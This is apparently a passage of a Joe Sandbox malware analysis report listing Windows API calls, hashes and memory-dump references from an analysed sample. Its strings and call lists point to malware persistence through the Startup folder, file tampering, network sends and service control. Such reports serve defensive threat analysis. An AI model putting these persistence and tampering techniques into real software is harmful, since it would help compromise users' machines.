                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                              • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                                                                                                                                              • Instruction ID: b6f47af98b99390d2ca34363280ce03bc5e4d1be0f6c4f29549f69d6ae0d3a9a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5F119031711B04B6F520FBB2CC07FCBB7DC9F42308F814C2EB29E76152E628A9184645
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                                                                                                                                                                                              • _free.LIBCMT ref: 100092AB
                                                                                                                                                                                                                                • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                                                                                                                • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                                                              • _free.LIBCMT ref: 100092B6
                                                                                                                                                                                                                              • _free.LIBCMT ref: 100092C1
                                                                                                                                                                                                                              • _free.LIBCMT ref: 10009315
                                                                                                                                                                                                                              • _free.LIBCMT ref: 10009320
                                                                                                                                                                                                                              • _free.LIBCMT ref: 1000932B
                                                                                                                                                                                                                              • _free.LIBCMT ref: 10009336
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4127465137.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127439408.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127465137.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_10000000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                              • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                                                                                              • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C988
                                                                                                                                                                                                                                • Part of subcall function 0041CA1F: RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                                                                                                                                                                                                • Part of subcall function 0041CA1F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                                                                                                                                                                                                • Part of subcall function 0041CA1F: GetLastError.KERNEL32 ref: 0041CA91
                                                                                                                                                                                                                              • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9BF
                                                                                                                                                                                                                              • lstrcpyn.KERNEL32(00473B68,0046C104,00000080), ref: 0041C9D9
                                                                                                                                                                                                                              • Shell_NotifyIcon.SHELL32(00000000,00473B50), ref: 0041C9EF
                                                                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 0041C9FB
                                                                                                                                                                                                                              • DispatchMessageA.USER32(?), ref: 0041CA05
                                                                                                                                                                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA12
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1970332568-0
                                                                                                                                                                                                                              • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                                                                                                                                                              • Instruction ID: 0af2178feff80faf092f0d4c6bffee9b758878d1eb04e36c9ad6546aee081b39
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 760121B1944344ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe, xrefs: 00406927
                                                                                                                                                                                                                              • Rmc-R1T905, xrefs: 0040693F
                                                                                                                                                                                                                              • BG, xrefs: 00406909
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe$Rmc-R1T905$BG
                                                                                                                                                                                                                              • API String ID: 0-2134242417
                                                                                                                                                                                                                              • Opcode ID: 80050a427f5642be038ed20f9cc5897f2179df45ad3656bea1b8b3f18dea3d61
                                                                                                                                                                                                                              • Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 80050a427f5642be038ed20f9cc5897f2179df45ad3656bea1b8b3f18dea3d61
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __allrem.LIBCMT ref: 00439789
                                                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397A5
                                                                                                                                                                                                                              • __allrem.LIBCMT ref: 004397BC
                                                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397DA
                                                                                                                                                                                                                              • __allrem.LIBCMT ref: 004397F1
                                                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043980F
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1992179935-0
                                                                                                                                                                                                                              • Opcode ID: b721ad324d2d5e1716c277abfa1debc2215e4b1294dc948f47ad50236c9fda6c
                                                                                                                                                                                                                              • Instruction ID: 29148231e9435c1f59b8c02308e8e4f0c882d016d38a0f6ab7871d26eba04b65
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b721ad324d2d5e1716c277abfa1debc2215e4b1294dc948f47ad50236c9fda6c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A811B726017069BE724AE79CC82B6F73A8AF49328F24512FF511D66C1E7B8DD018B58
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,00449BA1,00000001,00000001,?), ref: 004499AA
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,?,?,?,00449BA1,00000001,00000001,?), ref: 00449A30
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B2A
                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00449B37
                                                                                                                                                                                                                                • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00446B31
                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00449B40
                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00449B65
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1414292761-0
                                                                                                                                                                                                                              • Opcode ID: 81d70c20703e66394a8e6e24da3589bfc2c015b76e7b2aedf7d205086cdaf592
                                                                                                                                                                                                                              • Instruction ID: d3450b84a68f20df6837e20b70452335b33749c243a385fd48b45426a0ff81fe
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 81d70c20703e66394a8e6e24da3589bfc2c015b76e7b2aedf7d205086cdaf592
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 89511572610246AFFB258F65DC81EBB77A9EB44754F15462EFC04E6240EF38EC40E668
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                                                                                                                                                                                              • __freea.LIBCMT ref: 10008A08
                                                                                                                                                                                                                                • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                                                                                              • __freea.LIBCMT ref: 10008A11
                                                                                                                                                                                                                              • __freea.LIBCMT ref: 10008A36
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4127465137.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127439408.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127465137.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_10000000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1414292761-0
                                                                                                                                                                                                                              • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                                                                                                                              • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __cftoe
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4189289331-0
                                                                                                                                                                                                                              • Opcode ID: 07fcb3c060a749777e725642930ed18157a1f5019e1f3146b4d3bc33616e3b2a
                                                                                                                                                                                                                              • Instruction ID: 646e0444ce84107b4b6d0ff1d92098e8eb0dfa86acef9ec08128487301265115
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 07fcb3c060a749777e725642930ed18157a1f5019e1f3146b4d3bc33616e3b2a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A851FC72900105ABFB249F598C81F6F77A9EFC9324F15421FF815A6281DB3DDD01866D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 00406C38
                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0), ref: 00406C80
                                                                                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(00000284,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00406CC0
                                                                                                                                                                                                                              • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000057,?,00000008), ref: 00406D08
                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(00000000), ref: 00406D18
                                                                                                                                                                                                                                • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?), ref: 0040456A
                                                                                                                                                                                                                                • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,0040460E,00000000,?), ref: 00404588
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1303771098-0
                                                                                                                                                                                                                              • Opcode ID: f285af7c7c524642bc4fad9ba75466deff9bc302eb79143aaa194a9082155581
                                                                                                                                                                                                                              • Instruction ID: a9f2b94bfe891e644ef5b97f564769cd4b441703f4f7d546a0b6aea2ef9939f1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f285af7c7c524642bc4fad9ba75466deff9bc302eb79143aaa194a9082155581
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1C31C2715083019FD210EF21DD459AFB7A8FB85715F40093FF9C6A21A1DB38AA48CB9A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _strlen.LIBCMT ref: 10001607
                                                                                                                                                                                                                              • _strcat.LIBCMT ref: 1000161D
                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                                                                                                                                                                                                              • lstrcatW.KERNEL32(?,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 1000165A
                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                                                                                                                                                                                                              • lstrcatW.KERNEL32(00001008,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 10001686
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4127465137.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127439408.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127465137.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_10000000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1922816806-0
                                                                                                                                                                                                                              • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                                                                                                                                              • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 10001038
                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                                                                                                                                                                                                              • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4127465137.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127439408.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127465137.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_10000000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3594823470-0
                                                                                                                                                                                                                              • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                                                                                                                                              • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011), ref: 00419C94
                                                                                                                                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,000F003F), ref: 00419CAB
                                                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 00419CB8
                                                                                                                                                                                                                              • ControlService.ADVAPI32(00000000,00000001,?), ref: 00419CC7
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Service$Open$CloseControlHandleManager
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1243734080-0
                                                                                                                                                                                                                              • Opcode ID: 3abd86868e1217ea2d45c9c88d919e3d4f56aa0647f23c1260161372d98c8da3
                                                                                                                                                                                                                              • Instruction ID: aaf019a9b49167a30595a2ca3c371567d0eeee9026f0995440eeab6e66ec65be
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3abd86868e1217ea2d45c9c88d919e3d4f56aa0647f23c1260161372d98c8da3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 00118632901218AFD7116B64EC85DFF3FACDB45BA5B000036F502921D1DB64DD46AAF5
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00437DFD,004377B1), ref: 00437E14
                                                                                                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E22
                                                                                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E3B
                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,00437DFD,004377B1), ref: 00437E8D
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3852720340-0
                                                                                                                                                                                                                              • Opcode ID: 91ac95939cd3c96bc489c52a0530c238d3093d1082c7131376b84a6130b97103
                                                                                                                                                                                                                              • Instruction ID: be779a20f6972cc68ff7cd304671387be2c97454b743a33de387a584dbd8fa65
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 91ac95939cd3c96bc489c52a0530c238d3093d1082c7131376b84a6130b97103
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2A01D8B222D315ADEB3427757C87A172699EB09779F2013BFF228851E1EF294C41914C
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                                                                                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                                                                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4127465137.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127439408.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127465137.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_10000000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3852720340-0
                                                                                                                                                                                                                              • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                                                                                                                                                              • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?), ref: 00446EC3
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00446EF6
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00446F1E
                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,0043E4CD,?,?), ref: 00446F2B
                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,0043E4CD,?,?), ref: 00446F37
                                                                                                                                                                                                                              • _abort.LIBCMT ref: 00446F3D
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3160817290-0
                                                                                                                                                                                                                              • Opcode ID: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                                                                                                                                                              • Instruction ID: 3d2b287d931d31d162837175e2379b90ae0e47a7897f975c134f35b9cb22fcab
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2AF0F93560870177F6226339BD45A6F16559BC37A6F36003FF414A2293EE2D8C46451F
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                                                                                                                                                                              • _free.LIBCMT ref: 10005B2D
                                                                                                                                                                                                                              • _free.LIBCMT ref: 10005B55
                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                                                                                                                                                                              • _abort.LIBCMT ref: 10005B74
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4127465137.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127439408.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127465137.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_10000000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3160817290-0
                                                                                                                                                                                                                              • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                                                                                                                                              • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                                                                                                                                                • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
